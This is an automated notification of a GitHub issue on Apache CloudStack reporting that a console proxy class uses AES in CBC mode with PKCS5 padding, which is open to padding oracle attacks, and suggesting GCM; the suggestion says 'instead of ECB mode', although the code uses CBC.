Mahir92 opened a new issue #4694: URL: https://github.com/apache/cloudstack/issues/4694
In file https://github.com/apache/cloudstack/blob/0f3f2a09370a18301db28ec3d28efe746b6437c9/services/console-proxy/server/src/main/java/com/cloud/consoleproxy/ConsoleProxyPasswordBasedEncryptor.java (at Line 61), insecure "AES/CBC/PKCS5Padding" was used for encryption. Security Impact: Cipher Block Chaining (CBC) with PKCS#5 padding (or PKCS#7) is susceptible to padding oracle attacks Useful Resources: https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-4432 Solution we suggest: Use GCM mode instead of ECB mode. Please share with us your opinions/comments if there is any: Is the bug report helpful? ---------------------------------------------------------------- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. For queries about this service, please contact Infrastructure at: us...@infra.apache.org
